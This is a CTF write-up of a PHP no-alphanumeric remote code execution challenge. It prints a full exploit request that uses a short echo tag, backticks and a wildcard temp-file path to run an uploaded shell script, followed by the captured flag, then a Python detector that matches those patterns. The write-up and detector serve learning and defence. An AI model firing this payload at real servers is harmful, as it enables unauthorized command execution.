Web-26-1 | Is This... a Webshell?_revenge
Ramblings
No-alphanumeric RCE 2.0
Writeup
This time the dollar sign and the underscore are banned as well, and the payload length is limited. Following the approach from the tutorial, we can POST a shell file to the PHP script; PHP saves it to the temporary directory, and we can execute it with `. filename`. First, write an HTML upload form and serve it with Apache to simulate the file upload, so that we can capture the standard request format and its characteristic markers:
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Document</title>
</head>
<body>
  <form action="http://ip:port/" method="POST" enctype="multipart/form-data">
    <input type="file" name="file">
    <input type="submit" name="submit">
  </form>
</body>
</html>
Then apply it to our target, adding wildcards; the payload is as follows:
POST /index.php?shell=?><?=`.+/???/????????[@-[]`;?> HTTP/1.1
Host: 127.0.0.1
Content-Length: 199
Cache-Control: max-age=0
Origin: http://127.0.0.1:55013
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7YheBTd5DdLj9Zrj
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
------WebKitFormBoundary7YheBTd5DdLj9Zrj
Content-Disposition: form-data; name="file"; filename="test.txt"
Content-Type: text/plain
#! /bin/bash
env
------WebKitFormBoundary7YheBTd5DdLj9Zrj--
We get the flag: moectf{f140345d-f997-e7e4-02fa-e9008165c58f}
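As an added example (not part of the original writeup), here is a small Python scanner that flags request lines carrying the hallmarks of the technique above: a `<?=` short echo tag, backtick command execution, and a wildcard-only path of the same shape as PHP's upload temp file. The sample request lines are constructed for this example, and the regexes are heuristics rather than a complete signature.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request lines (not from any real log). The first mirrors
# the payload shape in this writeup, the second is an ordinary page load, and
# the third is the first one URL-encoded.
SAMPLE_REQUESTS = [
    "POST /index.php?shell=?><?=`.+/???/????????[@-[]`;?> HTTP/1.1",
    "GET /index.php?page=about HTTP/1.1",
    "GET /index.php?shell=%3F%3E%3C%3F%3D%60.+%2F%3F%3F%3F%2F%3F%3F%3F%3F"
    "%3F%3F%3F%3F%5B%40-%5B%5D%60%3B%3F%3E HTTP/1.1",
]

# Heuristics for the technique described above.
CHECKS = {
    # PHP short echo tag smuggled into a parameter
    "php_short_echo": re.compile(r"<\?="),
    # shell execution via backticks
    "backtick_exec": re.compile(r"`[^`]*`"),
    # "/???/????????" plus an optional bracket range: a wildcard-only path of
    # the same length as the PHP upload temp file (/tmp/php + 6 random chars)
    "glob_tmp_upload": re.compile(r"/\?{3}/\?{6,9}(\[[^\]]*\])?"),
}


def decode_request_target(request_line: str) -> str:
    """Return the URL-decoded request target of an HTTP request line."""
    parts = request_line.split(" ")
    if len(parts) < 2:
        return ""
    return unquote_plus(parts[1])


def flag_request(request_line: str) -> list[str]:
    """Names of the heuristics that fire on the request target (empty if clean)."""
    target = decode_request_target(request_line)
    return [name for name, pattern in CHECKS.items() if pattern.search(target)]


def scan(lines: list[str]) -> dict[str, list[str]]:
    """Map each suspicious request line to the checks it triggered."""
    results = {}
    for line in lines:
        hits = flag_request(line)
        if hits:
            results[line] = hits
    return results


if __name__ == "__main__":
    for line, hits in scan(SAMPLE_REQUESTS).items():
        print(f"{', '.join(hits)}: {line}")
```

Decoding the target before matching matters: the third sample is byte-for-byte different from the first in the log, yet triggers the same checks.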